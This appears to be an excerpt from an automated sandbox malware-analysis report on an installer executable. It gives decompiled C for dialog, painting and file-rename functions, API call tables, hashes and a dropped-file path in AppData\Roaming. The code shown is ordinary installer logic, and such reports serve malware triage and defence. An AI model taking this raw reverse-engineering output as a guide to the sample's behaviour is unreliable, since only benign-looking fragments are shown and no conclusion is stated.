                            0x0040429c
                            0x004042a2
                            0x004042a4
                            0x004042a9
                            0x004042a6
                            0x004042a6
                            0x004042a6
                            0x004042b9
                            0x004042d1
                            0x004042d3
                            0x004042d9
                            0x004042ee
                            0x004042db
                            0x004042e4
                            0x004042e6
                            0x004042e6
                            0x004042f4
                            0x00404305
                            0x0040431b
                            0x00404322
                            0x00404328
                            0x0040432c
                            0x00404331
                            0x00404333
                            0x00000000
                            0x00404339
                            0x00404339
                            0x0040433b
                            0x00000000
                            0x00000000
                            0x00404341
                            0x00404345
                            0x0040436a
                            0x00404370
                            0x00404376
                            0x00404378
                            0x00000000
                            0x00000000
                            0x0040439e
                            0x004043a4
                            0x004043a6
                            0x004043ab
                            0x00000000
                            0x00000000
                            0x004043b1
                            0x004043b4
                            0x004043b7
                            0x004043ce
                            0x004043da
                            0x004043f3
                            0x004043f9
                            0x004043fd
                            0x00404402
                            0x00404408
                            0x00000000
                            0x00000000
                            0x00404412
                            0x0040441d
                            0x00000000
                            0x0040441d
                            0x00404347
                            0x0040434d
                            0x00000000
                            0x00000000
                            0x00404353
                            0x00404359
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040435f
                            0x00404333
                            0x0040442a
                            0x00404436
                            0x0040443d
                            0x00000000
                            0x00404188
                            0x00404188
                            0x0040418b
                            0x004041be
                            0x004041be
                            0x004041c0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004041c0
                            0x0040418d
                            0x00404191
                            0x00404196
                            0x00404198
                            0x00000000
                            0x00000000
                            0x004041a8
                            0x004041b0
                            0x00000000
                            0x004041b6
                            0x00403fbe
                            0x00403fbe
                            0x00403fc2
                            0x00403fc7
                            0x00403fd6
                            0x00403fd6
                            0x00403fdc
                            0x00403fe3
                            0x00404027
                            0x0040402d
                            0x00404046
                            0x00404049
                            0x0040405c
                            0x00404062
                            0x00000000
                            0x00000000
                            0x00404068
                            0x00404073
                            0x00404075
                            0x00404077
                            0x00404096
                            0x00404096
                            0x00404099
                            0x0040409e
                            0x004040a1
                            0x004040b1
                            0x004040b2
                            0x004040b4
                            0x004040ea
                            0x004040fa
                            0x00000000
                            0x004040fa
                            0x004040b6
                            0x004040bc
                            0x004040d5
                            0x004040da
                            0x004040dc
                            0x00000000
                            0x00000000
                            0x004040de
                            0x004040ca
                            0x004040ca
                            0x004040cc
                            0x004040cc
                            0x00000000
                            0x004040cc
                            0x004040bf
                            0x004040c4
                            0x00000000
                            0x004040c4
                            0x004040a3
                            0x004040a9
                            0x00000000
                            0x00000000
                            0x004040ab
                            0x00000000
                            0x004040ab
                            0x0040409b
                            0x00000000
                            0x0040409b
                            0x00404081
                            0x00404088
                            0x0040408e
                            0x00404090
                            0x00404466
                            0x00000000
                            0x00404466
                            0x00000000
                            0x00404090
                            0x0040404e
                            0x00000000
                            0x00404056
                            0x00404035
                            0x0040403b
                            0x00404443
                            0x00404449
                            0x00404456
                            0x0040445c
                            0x0040445c
                            0x00000000
                            0x00403fe5
                            0x00403fea
                            0x00403ff6
                            0x00403fff
                            0x00404100
                            0x00000000
                            0x0040401e
                            0x00404021
                            0x00000000
                            0x00404021
                            0x00403fff
                            0x00403fe3

                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                            • ShowWindow.USER32(?), ref: 00403FF6
                            • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                            • ShowWindow.USER32(?,00000004), ref: 00404021
                            • DestroyWindow.USER32 ref: 00404035
                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                            • GetDlgItem.USER32 ref: 0040406D
                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                            • IsWindowEnabled.USER32(00000000), ref: 00404088
                            • GetDlgItem.USER32 ref: 00404133
                            • GetDlgItem.USER32 ref: 0040413D
                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                            • GetDlgItem.USER32 ref: 0040424E
                            • ShowWindow.USER32(00000000,?), ref: 0040426F
                            • EnableWindow.USER32(?,?), ref: 00404281
                            • EnableWindow.USER32(?,?), ref: 0040429C
                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                            • EnableMenuItem.USER32 ref: 004042B9
                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                            • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                            • ShowWindow.USER32(?,0000000A), ref: 00404456
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                            • String ID:
                            • API String ID: 1860320154-0
                            • Opcode ID: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
                            • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                            • Opcode Fuzzy Hash: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
                            • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t116 =  *0x42c240 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433edc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}


















                            0x0040466a
                            0x00404797
                            0x004047f4
                            0x004047f8
                            0x004048c5
                            0x004048c7
                            0x004048c7
                            0x004048cd
                            0x004048cd
                            0x004048d0
                            0x00000000
                            0x004048d7
                            0x00404806
                            0x0040480c
                            0x00404816
                            0x00404821
                            0x00404824
                            0x00404827
                            0x00404832
                            0x00404835
                            0x0040483c
                            0x00404849
                            0x0040485a
                            0x00404860
                            0x00404868
                            0x00404876
                            0x0040487c
                            0x0040487c
                            0x0040483c
                            0x00404886
                            0x00000000
                            0x00404891
                            0x00404895
                            0x004048a5
                            0x004048a5
                            0x004048ab
                            0x004048b7
                            0x004048b7
                            0x00000000
                            0x004048bb
                            0x00404886
                            0x004047a2
                            0x00000000
                            0x004047b4
                            0x004047b9
                            0x004047bf
                            0x00000000
                            0x00000000
                            0x004047e8
                            0x004047ea
                            0x004047ef
                            0x00000000
                            0x004047ef
                            0x004047a2
                            0x00404670
                            0x00404673
                            0x00404678
                            0x00404689
                            0x00404689
                            0x00404691
                            0x00404694
                            0x00404698
                            0x0040469b
                            0x0040469f
                            0x004046a2
                            0x004046a5
                            0x004046a8
                            0x004046af
                            0x004046b1
                            0x004046b1
                            0x004046bb
                            0x004046c8
                            0x004046d2
                            0x004046d7
                            0x004046da
                            0x004046df
                            0x004046f6
                            0x004046fd
                            0x00404710
                            0x00404713
                            0x00404727
                            0x0040472e
                            0x00404733
                            0x00404738
                            0x00404738
                            0x00404746
                            0x00404754
                            0x00404766
                            0x0040476b
                            0x0040477b
                            0x0040477d
                            0x00000000

                            APIs
                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                            • GetDlgItem.USER32 ref: 0040470A
                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                            • GetSysColor.USER32(?), ref: 00404738
                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                            • lstrlenW.KERNEL32(?), ref: 00404759
                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                            • GetDlgItem.USER32 ref: 004047D4
                            • SendMessageW.USER32(00000000), ref: 004047DB
                            • GetDlgItem.USER32 ref: 00404806
                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                            • SetCursor.USER32(00000000), ref: 0040485A
                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                            • SetCursor.USER32(00000000), ref: 00404876
                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                            • String ID: C:\Users\user\AppData\Roaming\34432.exe$N
                            • API String ID: 3103080414-2212789012
                            • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                            • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                            • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                            • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                            0x0040100a
                            0x00401039
                            0x00401047
                            0x0040104d
                            0x00401051
                            0x0040105b
                            0x00401061
                            0x00401064
                            0x004010f3
                            0x00401089
                            0x0040108c
                            0x004010a6
                            0x004010bd
                            0x004010cc
                            0x004010cf
                            0x004010d5
                            0x004010d9
                            0x004010e4
                            0x004010ed
                            0x004010ef
                            0x004010ef
                            0x00401100
                            0x00401105
                            0x0040110d
                            0x00401110
                            0x00401112
                            0x00401118
                            0x0040111f
                            0x00401126
                            0x00401130
                            0x00401142
                            0x00401156
                            0x00401160
                            0x00401165
                            0x00401165
                            0x00401110
                            0x0040116e
                            0x00000000
                            0x00401178
                            0x00401010
                            0x00401013
                            0x00401015
                            0x0040101f
                            0x0040101f
                            0x00000000

                            APIs
                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                            • BeginPaint.USER32(?,?), ref: 00401047
                            • GetClientRect.USER32(?,?), ref: 0040105B
                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                            • FillRect.USER32 ref: 004010E4
                            • DeleteObject.GDI32(?), ref: 004010ED
                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                            • SelectObject.GDI32(00000000,?), ref: 00401140
                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                            • DeleteObject.GDI32(?), ref: 00401165
                            • EndPaint.USER32(?,?), ref: 0040116E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                            • String ID: F
                            • API String ID: 941294808-1304234792
                            • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                            • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                            • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                            • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                            0x00406183
                            0x0040618c
                            0x00406193
                            0x0040619d
                            0x004061b1
                            0x004061d9
                            0x004061e4
                            0x004061e8
                            0x00406208
                            0x0040620f
                            0x00406219
                            0x00406226
                            0x0040622b
                            0x00406230
                            0x00406234
                            0x00406243
                            0x00406245
                            0x00406252
                            0x00406256
                            0x004062f1
                            0x00000000
                            0x0040626c
                            0x00406279
                            0x0040629d
                            0x004062a1
                            0x004062c0
                            0x004062c4
                            0x004062c4
                            0x004062c6
                            0x004062cf
                            0x004062da
                            0x004062e5
                            0x004062eb
                            0x00000000
                            0x004062eb
                            0x004062a3
                            0x004062a6
                            0x004062b1
                            0x004062ad
                            0x004062af
                            0x004062b0
                            0x004062b0
                            0x004062b8
                            0x004062ba
                            0x00000000
                            0x004062ba
                            0x00406284
                            0x0040628a
                            0x00000000
                            0x0040628a
                            0x00406256
                            0x00406234
                            0x004061b3
                            0x004061be
                            0x004061c7
                            0x004061cb
                            0x00000000
                            0x00000000
                            0x004061cb
                            0x004062fc

                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                            • GetShortPathNameW.KERNEL32 ref: 004061C7
                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                            • GetShortPathNameW.KERNEL32 ref: 004061E4
                            • wsprintfA.USER32 ref: 00406202
                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                            • GlobalFree.KERNEL32 ref: 004062EB
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                            • String ID: %ls=%ls$[Rename]
                            • API String ID: 2171350718-461813615
                            • Opcode ID: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
                            • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                            • Opcode Fuzzy Hash: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
                            • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                            0x00404512
                            0x004045c8
                            0x00000000
                            0x004045c8
                            0x00404523
                            0x00404527
                            0x00000000
                            0x00404541
                            0x00404541
                            0x0040454a
                            0x00000000
                            0x00000000
                            0x0040454c
                            0x00404558
                            0x0040455b
                            0x0040455b
                            0x00404561
                            0x00404567
                            0x00404567
                            0x00404573
                            0x00404579
                            0x00404580
                            0x00404583
                            0x00404586
                            0x00404588
                            0x00404588
                            0x00404590
                            0x00404596
                            0x00404596
                            0x004045a0
                            0x004045a5
                            0x004045a8
                            0x004045ad
                            0x004045b0
                            0x004045b0
                            0x004045c0
                            0x004045c0
                            0x00000000
                            0x004045c3

                            APIs
                            • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                            • GetSysColor.USER32(00000000), ref: 0040455B
                            • SetTextColor.GDI32(?,00000000), ref: 00404567
                            • SetBkMode.GDI32(?,?), ref: 00404573
                            • GetSysColor.USER32(?), ref: 00404586
                            • SetBkColor.GDI32(?,?), ref: 00404596
                            • DeleteObject.GDI32(?), ref: 004045B0
                            • CreateBrushIndirect.GDI32(?), ref: 004045BA
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
